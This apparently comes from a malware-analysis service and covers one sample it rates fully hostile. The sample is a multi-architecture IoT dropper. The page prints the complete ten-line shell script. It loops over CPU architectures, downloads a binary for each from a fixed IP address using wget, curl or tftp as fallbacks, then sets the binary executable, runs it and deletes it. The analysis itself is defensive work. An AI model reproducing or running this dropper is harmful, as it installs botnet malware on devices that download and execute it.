Hostile 100% Download

6adf22b7deaf177b7ef5bee65e50e2c689afb8bcb97fb5f0d920476ad4d07d9b.unknown

Multi-arch malware dropper downloads and executes binaries

Multi-architecture protocol fallback executionVariable-host fallback download executes payload
SHA-2566adf22b7deaf177b7ef5bee65e50e2c689afb8bcb97fb5f0d920476ad4d07d9b

Evidence

Fetch URL host is a variable lines 1–10
1binarys="mips mpsl arm7 arm arm6 arm5 ppc sh4"
2server_ip="45.202.35.24"
3for arch in $binarys
4do
5rm -rf $arch
6wget http://$server_ip/$arch || curl -O http://$server_ip/$arch || tftp $server_ip -c get $arch || tftp -g -r $arch $server_ip
7chmod 777 $arch
8./$arch tplink
9rm -rf $arch
10done

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.